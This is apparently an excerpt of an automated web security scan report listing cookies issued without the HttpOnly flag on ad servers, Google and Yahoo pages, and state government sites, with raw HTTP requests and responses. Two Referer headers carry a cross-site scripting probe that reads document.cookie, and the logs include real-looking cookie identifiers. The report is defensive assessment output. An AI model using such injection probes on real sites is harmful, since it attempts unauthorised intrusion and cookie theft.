Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Ftn.gov%2F&jsref=&rnd=1304123873055
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 30 Apr 2011 00:37:31 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Mon, 29-Apr-2013 00:37:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.278. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2830617534928024 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Sun, 29-Apr-2012 15:08:25 GMT; Path=/
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.279. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=1443&token=NETM7 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; Domain=.contextweb.com; Expires=Sun, 03-Apr-2016 15:08:25 GMT; Path=/
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.280. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:15 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5709590221a1f224:TM=1304165955:LM=1304165955:S=iNZcUgSOgqvTQKYz; expires=Mon, 29-Apr-2013 12:19:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

14.281. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:15 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e36f394532d067c7:TM=1304165955:LM=1304165955:S=l9qzxqCpZj00FDw6; expires=Mon, 29-Apr-2013 12:19:15 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=Hb_21DNapDoYwoEnZnmA0fNSixtJgr-c3mI0F09lL3C31SjZW8RyYmhtkN5C3GIAykyFmUASCCADP5lbygjXrZo2Mb2DfP3Q4JJLsfKR8adffrnODC-xwhVYiFRb63yy; expires=Sun, 30-Oct-2011 12:19:15 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

14.282. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:16 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=126a2d407bee17e8:TM=1304165956:LM=1304165956:S=x4cjRm33Cdhrg9Pd; expires=Mon, 29-Apr-2013 12:19:16 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=oXRFGrGgpA-uJVQm1y8zv-orteWaJLenuLFLLfKqUKQTHYB3Yqgm8SPCW_z5-tQgGekeHuCZV2ZttKNBUIW_gsfmKm55WBgfhpaJ6Hlh0nKdz0rzK7N5kDW1PG_YSBhD; expires=Sun, 30-Oct-2011 12:19:16 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi
...[SNIP]...

14.283. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=f45d7f8d-550c-47b4-99e7-f004537718b33HS0c0; expires=Fri, 29-Jul-2011 08:18:44 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346343&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08:18:44 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:44 GMT
Connection: close
Content-Length: 0


14.284. http://co.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://co.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: co.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 11:13:20 GMT
Server: Apache
Location: http://www.colorado.gov/
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServer=348127242.20480.0000; path=/
Content-Length: 208

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.colorado.gov/">here</a>.</p>
</body>
...[SNIP]...

14.285. http://del.icio.us/post  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://del.icio.us
Path:   /post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:20:04 GMT
Set-Cookie: BX=61ksmkt6rnvjk&b=3&s=6l; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162

The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P>
<!-- fe01.web.del.ac4.yahoo.net uncompressed/chunked Sat Apr 30 12:20:04 UTC 2011 -->

14.286. http://delicious.com/post  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delicious.com
Path:   /post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:20:05 GMT
Set-Cookie: BX=09kdnn96rnvjl&b=3&s=is; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.19.4

The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P>
<!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Sat Apr 30 12:20:05 UTC 2011 -->

14.287. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

14.288. https://favorites.live.com/quickadd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://favorites.live.com
Path:   /quickadd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quickadd.aspx HTTP/1.1
Host: favorites.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://office.live.com/sharefavorite.aspx%2f.SharedFavorites
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=e359122d-0181-486e-a9ac-20d6233faf63&&BAYxxxxxxC636&158; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1893731954&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=skydrive.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 30-Apr-2011 10:40:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:20:34 GMT
Connection: close
Content-Length: 178

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://office.live.com/sharefavorite.aspx%2f.SharedFavorites">here</a>.</h2>
</body></html>

14.289. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /q HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:34 GMT
Set-Cookie: B=3bnjjep6rnvki&b=3&s=if; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=; expires=Tue, 27 Apr 2021 05:20:34 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.19.5

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Quotes &
...[SNIP]...

14.290. https://fortress.wa.gov/dol/dolprod/vehoffices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/vehoffices/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dol/dolprod/vehoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 34239
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head><title>
   WA Stat
...[SNIP]...

14.291. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c14b1274934572ff:TM=1304166055:LM=1304166055:S=6GKsyI7Du5NAVM93; expires=Mon, 29-Apr-2013 12:20:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 12:20:55 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

14.292. http://i.w55c.net/rs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /rs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rs?id=7d5c82fe65bf4b509737fd10548dc888&t=marketing HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Mon, 29-Apr-13 15:08:50 GMT
Cache-Control: no-store
X-Powered-By: Mirror Image Internet
P3p: CP="NOI DSP COR NID"
Date: Sat, 30 Apr 2011 15:08:50 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.293. http://ia.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ia.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ia.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:11 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Set-Cookie: CAKEPHP=ejk5jm9ptanapdihm60fns6k95; path=/
Vary: Accept-Encoding
Content-Length: 19115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.294. http://ia.gov/weather_conditions/9430739  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ia.gov
Path:   /weather_conditions/9430739

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weather_conditions/9430739 HTTP/1.1
Host: ia.gov
Proxy-Connection: keep-alive
Referer: http://ia.gov/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=p8pokrrg86sfk5b15r4349in42; __utmz=44504380.1304161960.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44504380.208141868.1304161960.1304161960.1304161960.1; __utmc=44504380; __utmb=44504380.1.10.1304161960

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:19 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Set-Cookie: CAKEPHP=ej0h5ba0g1ddjnh6b07d4qbt41; path=/
Vary: Accept-Encoding
Content-Length: 641

<h2>Weather</h2>
<h3 id="location">Des Moines</h3>
<p><span class="temp">58&deg;F </span> Cloudy</p>
<p><a href="#" id="change_location_link" onclick="javascript:$('#weather_zip_input').show();$('#c
...[SNIP]...

14.295. http://idaho.gov/public/portal/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idaho.gov
Path:   /public/portal/contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /public/portal/contact.html HTTP/1.1
Host: idaho.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=154226400.1304162086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=154226400.1209179509.1304162086.1304162086.1304162086.1; __utmc=154226400; __utmb=154226400.1.10.1304162086;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:00 GMT
Server: IIC
Content-Disposition: inline; filename="ScriptForm.contactform.ScriptStepView.general.defaultSkin"
Expires: -1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 17030
Set-Cookie: MoJoHammer.prod_public=c/VHBKP7qXcVnFndxxjC1tHJ5f4vWGWIAZzjmdHWS5i72Ip5Sdjn4q0JwHAzEp3IF6mbanT7bo5N; Path=/public/portal/contact.html
Set-Cookie: MoJoDuck.prod_public=+s+5473CNOXvAe5dCwqBdTrU/VhMX0tFAJFiX8GwBhX52Ip5Sdjn4q1cf0s4hU7IIZa8hQTBkWI9; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Contact Idaho.gov - Idaho.gov
